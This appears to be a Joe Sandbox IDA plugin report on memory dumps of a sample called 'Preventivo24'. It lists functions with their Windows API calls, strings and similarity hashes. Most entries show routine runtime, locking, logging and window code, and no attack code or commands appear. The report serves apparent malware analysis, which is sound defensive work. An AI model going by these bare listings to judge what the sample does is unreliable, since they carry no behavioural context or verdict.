Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Wow64$ProcessRedirection$CloseCodeCreateDisableErrorExitHandleLastObjectRevertSingleWait
String ID:
API String ID: 1153077990-0
Opcode ID: ce9a09347378e2ed704c599ca9fa535e2f2689e66292707148ee80f556fa7907
Instruction ID: 0b39bd20cc6bcd43893b9091ae1e0b9875f85f65d27653aae6a9b96157492b9a
Opcode Fuzzy Hash: ce9a09347378e2ed704c599ca9fa535e2f2689e66292707148ee80f556fa7907
Instruction Fuzzy Hash: C9418E71E043499BEB10CFA5CC447EEBBF8EF59310F148269E824A7290E7749981CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C04086 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00C04193,?,?,?,00000000,00000000,?,00C043FD,00000021,FlsSetValue,00C9FC3C,00C9FC44,?), ref: 00C04147

Strings

api-ms-, xrefs: 00C040DD
ext-ms-, xrefs: 00C040F1

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 9863f19b10e6f420585f189d5ab1a2640e9bd25aa6771c5240e2d8619b87428e
Instruction ID: 7af2db7d1f3f9913d9ee5b45d6a254c4b0156889bc836811b99b0d0603e08990
Opcode Fuzzy Hash: 9863f19b10e6f420585f189d5ab1a2640e9bd25aa6771c5240e2d8619b87428e
Instruction Fuzzy Hash: 6C2124B2A00210EBCB35DB24AC41B5F7769AB61760F210160EB26E72D0DA30EE41CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 00BE777E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00BE77F9,00BE775C,00BE79FD), ref: 00BE7795
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00BE77AB
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00BE77C0

Strings

ReleaseSRWLockExclusive, xrefs: 00BE77B5
AcquireSRWLockExclusive, xrefs: 00BE77A5
KERNEL32.DLL, xrefs: 00BE7790

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: bca8e64265f7a1384ec58f4e6e974af792a0e0a213b1075ee681ae1d27d872bc
Instruction ID: 9b5d98308dc26a10cf3922fec453d9271515d7ac35756178f1db7baf2f8febb0
Opcode Fuzzy Hash: bca8e64265f7a1384ec58f4e6e974af792a0e0a213b1075ee681ae1d27d872bc
Instruction Fuzzy Hash: E2F0F6323DC2A25B6B715FB69CC0B6B27D8EA0931832044F9E905D3250EF20CC82A7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00AF92F0 Relevance: 9.2, APIs: 6, Instructions: 170windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001036,00010000,00000000), ref: 00AF9368
GetParent.USER32(00000000), ref: 00AF93D4
GetWindowRect.USER32(00000000), ref: 00AF93DB
GetParent.USER32(00000000), ref: 00AF93EA

Part of subcall function 00AABC20: GetWindowRect.USER32(?,?), ref: 00AABCBB
Part of subcall function 00AABC20: GetWindowRect.USER32(?,?), ref: 00AABCD3

SendMessageW.USER32(?,00001026,00000000,000000FF), ref: 00AF94E6
SendMessageW.USER32(?,0000108A,00000000,00000011), ref: 00AF94FD

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: MessageRectSendWindow$Parent
String ID:
API String ID: 425339167-0
Opcode ID: 4e4fec91642573d67716250546ede13641a548defa42394c2e287df150d67162
Instruction ID: ab9be05b0bcc97edee87ec6d694b282a5c7f5b4dd172b1dcba1af306e9ea5e33
Opcode Fuzzy Hash: 4e4fec91642573d67716250546ede13641a548defa42394c2e287df150d67162
Instruction Fuzzy Hash: 3A612575D01718ABDB10CFA4C949BAEBBB8FF49710F14421AF815B7390DB706A81DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A25590 Relevance: 9.2, APIs: 6, Instructions: 156COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00A255DA
std::_Lockit::_Lockit.LIBCPMT ref: 00A255FC
std::_Lockit::~_Lockit.LIBCPMT ref: 00A25624
__Getctype.LIBCPMT ref: 00A25705
std::_Facet_Register.LIBCPMT ref: 00A25767
std::_Lockit::~_Lockit.LIBCPMT ref: 00A2579B

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: cb78635cbd5ac5c4935a5e4b489b88c625e288a87b160cec960d6525447e71e4
Instruction ID: d1e81627c0c083819436923ee2e613f1517b7ca01ba8f481b2c0700ac57a77e5
Opcode Fuzzy Hash: cb78635cbd5ac5c4935a5e4b489b88c625e288a87b160cec960d6525447e71e4
Instruction Fuzzy Hash: AB61AFB1C00649DFDB01CF68D9417AAFBB4FF24314F2482A9D819AB351EB74AA45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A25390 Relevance: 9.1, APIs: 6, Instructions: 142COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00A253CD
std::_Lockit::_Lockit.LIBCPMT ref: 00A253EF
std::_Lockit::~_Lockit.LIBCPMT ref: 00A25417
__Getcoll.LIBCPMT ref: 00A254E1
std::_Facet_Register.LIBCPMT ref: 00A25526
std::_Lockit::~_Lockit.LIBCPMT ref: 00A25567

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
String ID:
API String ID: 1184649410-0
Opcode ID: c7702d390c6bea77d80d2b69be8605107d306ad199656edb4c6b49e5562b1c33
Instruction ID: 599772d3fe734d48c3e28ad76f2ce03e07bfcf473ebbbfcd0527059413509716
Opcode Fuzzy Hash: c7702d390c6bea77d80d2b69be8605107d306ad199656edb4c6b49e5562b1c33
Instruction Fuzzy Hash: 1351AD70C00668DFCB01DFA8E880B9DBBF1FF04314F244169E819AB281DB74AA45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BEC20A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00BEC201,00BEC1C4,?,?,00A2253D,00B1BF30,?,00000008), ref: 00BEC218
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BEC226
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BEC23F
SetLastError.KERNEL32(00000000,00BEC201,00BEC1C4,?,?,00A2253D,00B1BF30,?,00000008), ref: 00BEC291

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8238223d6bb8fa1bc22974741e860a24cbf1fee6766db186f47a82a1c811a3a6
Instruction ID: b3ff06defd156236b5306fc03294638375210bcec18a1e92f7ff44f0fc8eaa2c
Opcode Fuzzy Hash: 8238223d6bb8fa1bc22974741e860a24cbf1fee6766db186f47a82a1c811a3a6
Instruction Fuzzy Hash: 0301D43210935E5EA72537F67C85A2B2BD8EB1677036003FAF734952E0EF514C039164

Uniqueness

Uniqueness Score: -1.00%

Function 00B5CC80 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229networkCOMMON

Download Yara Rule

APIs

HttpQueryInfoW.WININET(?,?,00000000,?,00000000), ref: 00B5CCD7
GetLastError.KERNEL32 ref: 00B5CCE5
HttpQueryInfoW.WININET(?,?,00000000,00000104,00000000), ref: 00B5CD1F

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

Strings

realm, xrefs: 00B5D3BB, 00B5D3CD, 00B5D3D7
(, xrefs: 00B5D332

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: HttpInfoQuery$ErrorHeapLastProcess
String ID: ($realm
API String ID: 80095177-3250045794
Opcode ID: 96b73ae44a9d3d3e87b42677899321064c8663aebf8d4c238c3a6a4311323bf6
Instruction ID: 66c3c45671b2e9db0da788190310876303af706f884e9aa7063175f58e4e92d6
Opcode Fuzzy Hash: 96b73ae44a9d3d3e87b42677899321064c8663aebf8d4c238c3a6a4311323bf6
Instruction Fuzzy Hash: 9161E47190034A9FDB10EFA5CC86B6FBBF9EF45311F1441A9EC14A7291DB34A905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A1D900 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

CreateWindowExW.USER32(?,SysTabControl32,?,46010000,00000000,80000000,00000000,00000000,?,00000309,00000000), ref: 00A1DA1A
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A1DA29
SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00A1DA35

Part of subcall function 009EA880: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,00000000,009EAA2B,-00000010,?,?,?,26FBC52C,00000000,?,?), ref: 009EA8A3

Strings

SysTabControl32, xrefs: 00A1DA12
TabHost, xrefs: 00A1D98A, 00A1D99C, 00A1D9A6

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: MessageSend$CreateFindHeapProcessResourceWindow
String ID: SysTabControl32$TabHost
API String ID: 2520390496-2872506973
Opcode ID: 0c8c44f3f41324cdb4c02d7ed61ba57a4bc53c2f2521089cfeb9d5d6c3273a32
Instruction ID: 7b74c8acd1c5a1415ffe119210bc2693a46458b83143968a99a6737eca0a691a
Opcode Fuzzy Hash: 0c8c44f3f41324cdb4c02d7ed61ba57a4bc53c2f2521089cfeb9d5d6c3273a32
Instruction Fuzzy Hash: 13619135A002149FCB10DF69C884BAEBBB5FF8D320F144169E905EB391DB35AD05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B1EF90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00B1F134
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00B1F150
GetExitCodeProcess.KERNEL32(00000000,00C56BE7), ref: 00B1F161
CloseHandle.KERNEL32(00000000), ref: 00B1F16F

Strings

open, xrefs: 00B1F010

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
String ID: open
API String ID: 2321548817-2758837156
Opcode ID: c0d58526938165ff6f224959b506d1f5848c7d34f2e8106d5bf1054890853b08
Instruction ID: c76259eadfc1a17d0249a3aca73bc3810ad79edd38fbc24310cb1ab0937926e0
Opcode Fuzzy Hash: c0d58526938165ff6f224959b506d1f5848c7d34f2e8106d5bf1054890853b08
Instruction Fuzzy Hash: 47717C71A0064ADBDB04CF68C8547AEBBF4FF48324F1442A9E829E7391DB749D45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B563E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00D30080,26FBC52C,?), ref: 00B5641F
EnterCriticalSection.KERNEL32(?,26FBC52C,?), ref: 00B5642C
OutputDebugStringW.KERNEL32(00B37FF2,?,00000000), ref: 00B564F5
LeaveCriticalSection.KERNEL32(?,00000000), ref: 00B56587

Part of subcall function 009EB070: RtlAllocateHeap.NTDLL(?,00000000,?,26FBC52C,00000000,00C11B00,000000FF,?,?,00D25D3C,?,00000000,00B69FAB,8000000B,26FBC52C), ref: 009EB0BA

Strings

Logger::SetLogFile( %s ) while OLD path is:%s, xrefs: 00B56473

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CriticalSection$AllocateDebugEnterHeapInitializeLeaveOutputString
String ID: Logger::SetLogFile( %s ) while OLD path is:%s
API String ID: 117955849-1927537607
Opcode ID: dd376845dd4bb1529432ae03849e57d91ae36e6b467e7a43df3d235feceafd6a
Instruction ID: f72ed7d18603aa5962492450346f26bc24adaa041ee5659bb750b9473d66f211
Opcode Fuzzy Hash: dd376845dd4bb1529432ae03849e57d91ae36e6b467e7a43df3d235feceafd6a
Instruction Fuzzy Hash: 2651CD359002498FCF01DFA8C8447AEBBB1EF49315F544299EC15AB392DB35AE06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A24830 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00A24882
OpenProcessToken.ADVAPI32(00000000,00000028,00000000), ref: 00A2488F
GetLastError.KERNEL32 ref: 00A248CD
CloseHandle.KERNEL32(00000000), ref: 00A24904

Strings

SeShutdownPrivilege, xrefs: 00A2489D

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Process$CloseCurrentErrorHandleLastOpenToken
String ID: SeShutdownPrivilege
API String ID: 2767541406-3733053543
Opcode ID: 7de913dcd750d6762f410c249424ebf66e4b940917dccdea5d70a31c07a59134
Instruction ID: 4d3400687c762c8d00d0b3160c4c8baf8d201d2b0075518b95e01df4b028bbfc
Opcode Fuzzy Hash: 7de913dcd750d6762f410c249424ebf66e4b940917dccdea5d70a31c07a59134
Instruction Fuzzy Hash: 3D314671A44219AFEB109FA4DC49BEEBBF8FB08714F100169F911F7290DB759A04DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00AF9580 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 76libraryloaderwindowCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(SetWindowTheme), ref: 00AF964D
SendMessageW.USER32(?,00001036,00010000,00010000), ref: 00AF9698

Part of subcall function 00BEAB55: AcquireSRWLockExclusive.KERNEL32(00D2E928,?,?,?,009EB4A6,00D2F53C,26FBC52C,?,?,00C1207D,000000FF,?,00B4670A), ref: 00BEAB60
Part of subcall function 00BEAB55: ReleaseSRWLockExclusive.KERNEL32(00D2E928,?,?,?,009EB4A6,00D2F53C,26FBC52C,?,?,00C1207D,000000FF,?,00B4670A), ref: 00BEAB9A

Part of subcall function 00AD73D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00AD7412

Part of subcall function 00BEAB04: AcquireSRWLockExclusive.KERNEL32(00D2E928,?,?,009EB517,00D2F53C,00C75440), ref: 00BEAB0E
Part of subcall function 00BEAB04: ReleaseSRWLockExclusive.KERNEL32(00D2E928,?,009EB517,00D2F53C,00C75440), ref: 00BEAB41
Part of subcall function 00BEAB04: WakeAllConditionVariable.KERNEL32(00D2E924,?,009EB517,00D2F53C,00C75440), ref: 00BEAB4C

Strings

explorer, xrefs: 00AF9678
SetWindowTheme, xrefs: 00AF9642
UxTheme.dll, xrefs: 00AF95E1

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

